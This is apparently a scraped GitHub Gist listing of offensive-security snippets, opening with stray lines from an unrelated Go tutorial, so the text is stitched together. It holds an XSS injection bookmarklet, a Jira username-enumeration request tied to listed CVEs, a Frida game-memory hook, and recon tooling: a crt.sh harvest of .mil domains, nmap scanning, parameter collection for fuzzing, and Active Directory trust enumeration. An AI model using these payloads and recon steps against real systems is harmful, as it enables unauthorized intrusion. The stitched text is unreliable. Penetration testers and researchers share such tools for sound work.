This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
renniepak
/ XSS_Bookmarklet.js
Created
March 16, 2021 16:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0) |
bendtheory
/ burplist.py
Created
January 21, 2021 05:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
0x240x23elu
/ Jira bug-exploit
Last active
March 12, 2024 09:45
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { log } from "./logger"; | |
| import { AssertionError } from "assert"; | |
| const libil2cpp = Process.getModuleByName("libil2cpp.so"); | |
| const libil2cppb = libil2cpp.base; | |
| const playerinfo_serialize = libil2cppb.add(0x6c2e30); | |
| const playerinfo_deserialize = libil2cppb.add(0x6c316c); | |
| console.log("Starting script.."); | |
| function readString(pointr:NativePointer){ |
PatrikFehrenbach
/ Amass Config
Created
September 23, 2020 15:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |
0xatul
/ grabdomains.rb
Created
August 27, 2020 12:04
Grab dod root domains inscope of DOD, written by dee-see
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'open3' | |
| require 'net/http' | |
| require 'nokogiri' | |
| require 'parallel' | |
| # Requires the nokogiri gem (`gem install nokogiri`), the parallel gem (`gem install parallel`) and the psql client for PostgreSQL. | |
| def crtsh | |
| Open3.pipeline_rw 'psql -t -h crt.sh -p 5432 -U guest certwatch', "sed -e 's:^ *::g' -e 's:^*\\.::g' -e '/^$/d'", 'sort -u', "sed -e 's:*.::g'" do |i, o, t| | |
| i.write("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.mil'));") |
oliverdaff
/ nmap_fast.sh
Last active
September 14, 2020 00:59
Use nmap to find open ports fast and then run a detailed scans on the returned ports
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Use nmap to find open ports fast and then run a detailed scans on the returned ports | |
| if [ -z "$1" ] | |
| then | |
| echo "__nmap_fast__" | |
| echo "Usage: ./nmap_fast TARGET_HOSTNAME" | |
| fi | |
| TARGET_HOSTNAME=$1 |
screetsec
/ gist:6ee948503960f1b9d4b7b8465aea2d73
Last active
May 25, 2023 16:16
One Liner to get Hidden URL Parameter from Passive scan using Web Archive. Regex using DFA Engine, Support and Collecting URL with multi Parameter to Fuzzing & Removing Duplicate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
NewerOlder